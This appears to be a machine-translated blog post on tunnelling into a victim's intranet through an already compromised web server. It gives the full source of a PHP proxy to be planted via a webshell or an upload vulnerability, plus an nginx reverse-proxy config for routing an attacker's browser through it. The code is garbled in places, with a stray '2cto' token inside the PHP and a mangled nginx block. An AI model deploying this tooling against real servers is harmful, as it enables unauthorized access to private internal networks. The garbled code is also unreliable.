Implement proxy in webshell

Implement proxy in webshell

Sometimes the proxy needs to go to the Intranet, but the server does not have an Internet port, and it cannot execute commands to rebound lcx or escalate permissions. There is only one webshell, which is a pain point at this time.
Here we will share a relatively handy php + nginx reverse proxy, which can be easily implemented.

It is easy to set up. You can use webshell or upload vulnerabilities to the server of the other party.
Then configure the local nginx and perform a reverse proxy + rewrite.

First look at the code

Proxy. php
 

<?php if(!isset($_GET['url'])){ exit(0); } $ch = curl_init(); $url=$_GET['url']; if(strstr($url,'?')){ $url.='&'; } else{ $url.='?'; } unset($_GET['url']); foreach($_GET as $Key=>$Val){ if(get_magic_quotes_gpc()){ $Val=stripslashes($Val); } $url=$url.'&'.$Key.'='.urlencode($Val); } $cookie=''; foreach($_COOKIE as $Key=>$Val){ if(get_magic_quotes_gpc()){ $Val=stripslashes($Val); } $cookie=$cookie.$Key.'='.urlencode($Val).'; '; } if($_SERVER['REQUEST_METHOD']=="POST"){ curl_setopt($ch, CURLOPT_POST, 1); $post_data=''; 2ctoforeach($_POST as $Key=>$Val){ if(get_magic_quotes_gpc()){ $Val=stripslashes($Val); } $post_data=$post_data.'&'.$Key.'='.urlencode($Val); } curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); } curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_COOKIE, $cookie); curl_setopt($ch, CURLOPT_HEADER, TRUE); curl_setopt($ch, CURLOPT_NOBODY, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); if(isset($_SERVER['HTTP_REFERER'])){ curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_REFERER']); } $Response=curl_exec($ch); if(!$Response){ curl_close($ch); exit(0); } $HttpStatus=curl_getinfo($ch,CURLINFO_HTTP_CODE); $Header=substr($Response,0,curl_getinfo($ch, CURLINFO_HEADER_SIZE)); $Body=substr($Response,curl_getinfo($ch, CURLINFO_HEADER_SIZE)); $Headers=split("\r\n",$Header); foreach($Headers as $ThusHead){ if($ThusHead == 'Transfer-Encoding: chunked' || strstr($ThusHead,'Content-Length')!==false){ continue; } header($ThusHead,FALSE); } echo $Body; curl_close($ch); ?> 

The code is very simple, and there are some simple bugs. I don't know if you can see it, and I am too lazy to modify it.
In addition:
1. This proxy only supports basic GET/POST and does not support file upload. If you are interested, you can take a look at it for the benefit of everyone.
2. When the proxy forwards a post request, it does not use www-url-encode. Therefore, some programs may be unable to identify the request normally.

Add a new configuration in the local nginx

# Proxy webshell server {listen write the listening port here; location ~ () {Proxy_pass http: // webshell IP/file/storage/directory/www.bkjia.com/proxy.php? Url = http: // $ host/$ request_uri; proxy_set_header Host "Access webshell domain name ";}}

Then reload the nginx configuration and configure the browser to use the nginx listening port as the proxy.